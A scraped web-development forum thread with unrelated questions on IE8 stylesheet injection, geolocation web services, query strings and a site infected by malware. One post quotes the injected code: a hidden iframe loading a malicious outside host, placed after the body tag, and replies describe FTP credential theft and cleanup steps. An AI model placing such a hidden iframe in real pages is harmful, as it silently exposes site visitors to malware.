OK, I am not sure how you mean to do this. I am used to using AJAX calls to make things work, but I don't know how that differs from this kind of a call. How would I setup callbacks and addressing the webservice for the required function? You wouldn't happen to know an article or two that would explain this with code examples would you?
Thanks,

Hey.. This is not dealing with any AJAX requests to WebMethods.
Dont mix up this with client server architecture. Actually you are now dealing with Server-Server communication. Just add Web Reference to the Webservice from within your proxy webservice. The Classes will be created automatically. You just need to create object of them and call the functions of your need.

This site is more for programmers. If you have no idea how to write code, you might look for sites that have templates you can use to create a site, such as geocities ( if they are still around )

Hi friends.. I am making a small C++ plug-in IE which inserts a JS in any webpage. I am adding certain buttons in a web page and I use an external CSS (inserted through the already inserted JS). The problem is the CSS works fine in IE 6/7 but when i run the same plugin in IE 8 the CSS properties aren't applied. Other portions of the JS are running fine as expected just my elements arent getting styled property.. I am using the following code to insert a style sheet:
var sty = document.createElement("link");<br />
sty.rel = "stylesheet";<br />
sty.id = "myStyleSheet";<br />
sty.type = "text/css";<br />
sty.href = "http://mywebAddress/myStyles.css";<br />
sty = document.getElementsByTagName("head")[0].appendChild(sty);
The CSS myStyles.css has been validated too. In IE8 the entire style sheet is ignored (i.e. not a single property is applied). Please help..

Got a solution. Seems like IE8 doesnt require the 'class' property to be renamed as 'className'.
Changing the className to class solves the problem.
However as I need to work with both the IE7-8 I need to set both class and classname attribute. Is there any alternate way ?

this might help - make ie8 think it's ie7 - put this tag into your :

Actually I dont want the browser to think its IE7 because in that case pages styled with features supported only by IE-8 wont work properly..

Hi all,
I was a web app developer several years ago now. (Unfortunately, before .NET) I’m working for a small company now who is just expanding their technology and my knowledge about what they are wanting to do is quite out of date.
I plan on taking some classes soon to get me back up to speed, but I’d like to work on a project they wish to implement now. What I’m looking for is a developer who has a bit of time on their hands and is willing to walk me through creating what they are looking for. I don’t have a great deal of money, but I’m willing to discuss compensation for time spent. I tend to learn better “on the fly” then I do in a classroom setting in any case.
The project involves creating a web service that can pull records from a SQL 2008 database that have address, city and state, send this information to Yahoo geolocation (or some other service provider), read the XML response and append the Lat and Long to the record.
It would be great, if the service were flexible enough to be able to be called from other apps, for direct user input of the information to return lat and long, or to be passed an IP address from an app to create a user tracking record with lat and long as well, but these are additional features, not necessary to the core project. Also, since Yahoo geolocation will only process 5,000 requests a day, it would be cool if the service would redirect to another geolocation service (Google, etc.) when Yahoo is over-limit or out of service for some reason.
I’ve been looking over different parts of this, but I’m not sure how to put it all together. That is, I could probably cobble together an app to do it, but I’d like to make it reusable to other apps developed in the future. Developers who are interested in assisting/tutoring me in this may contact me at justicevan@gmail.com. Most of the knowledge I do have is in VB, VBscrips, Javascript and SQL. I have Visual Studio 2008 and SQL 2008.
Those who are not interested in assisting directly, may still feel free to comment on the difficulty of what it is I’m looking to do here, what problems or issues I may run into, or any ideas for how to implement this.
Thanks for your attention.

Hi All,
I want to add query string in the URL using javascript but I don't want to reload or redirect the page.
(When I use window.location = "some value", it redirects me to the corresponding page).
I also want to access the query string value in my server side code.
Please help me.
Thanks in Advance

Javascript is purely client side. If you want to retrieve data server side, you need a postback. You may however consider AJAX, which will do a postback, but is capable of doing a postback without the entire page reloading.
Cheers,
Eduard

My suggestion would be - use web service, to get data to client without postback.
It`s nothing to wory before something happen and when it happents it`s alredy to late to wory!

Hi,
On my website a virus is injecting IFRAME Virus code.
I tried to replace that infected files with the original one,
but that virus again injected the code.
I also tried changing FTP and Control Panel Passwords.
Still the virus has infected the files.
I have also checked my pc for viruses by scanning using Antivirus with updated database.
Bust still this virus has managed to infect my pages.
I have also gone through the log files of domain.
But it doesn’t help me.
The virus injects following type of code in default.asp and index.htm files.
e.g.
<body>
<div style="display:none">
<iframe src="http://medical-static-center.ru:8080/index.php" width=649 height=958 ></iframe>
</div>
<div style="display:none"></div><div style="display:none"></div>
<div style="display:none"></div><div style="display:none"></div>
<div style="display:none"></div><div style="display:none"></div>
The source (src="") of iframe varies each time of infection. It puts the code immediately after <body> tag.
Please help me. How to stops this virus from infecting my web pages?

Did your Antivirus software identify what virus you have on your PC. Perhaps you need to check the AV web sites for similar problems. Try Google searches for the URI that is being injected.
Are you absolutely certain this is a virus rather than a bug in your code?

|
|

I am not sure about that virus is present in my pc.
Because my localhost server is not being infected.
Only my remote files are get infected.
Some kind of robotic software (May be virus) is injecting this code in my website.

Well you need to check every machine involved in this for viruses. You also need to check your code quite carefully to ensure you have not left any security holes that a virus or trojan can break into.

Hey Kiran !
I have the same issue... and I found some data about it.
This virus was supposed to infect machines and stole FTP credentials from your ftp client. But instead of that (at least at my case) it is listening for the traffic flow, and gets your credentials when you make a connection.
Once the user and password were stoled, I found regular connections from foreing IPs.
So for now, I did this:
- remove manualy the iframes in your computer.
- Upload the files
- Change the password and don't use it until you clean this virus.
I couldn't find the name of this virus yet, if you do, please, tell me !
Some tips:
- I have nod32, and it found nothing in my PC.
- Panda security (web scann) can't find nothing either.
- When people with AVG and Avast try to go to an infected page, their AV gives them a message about the threat.
I hope it helps you a bit.
Regards.
Edgar

how to get the data from https for http page? is there any solution?

This question makes no sense. Have you been asking for days about the session between http and https ? Why not just make all that section of the site HTTPS ?
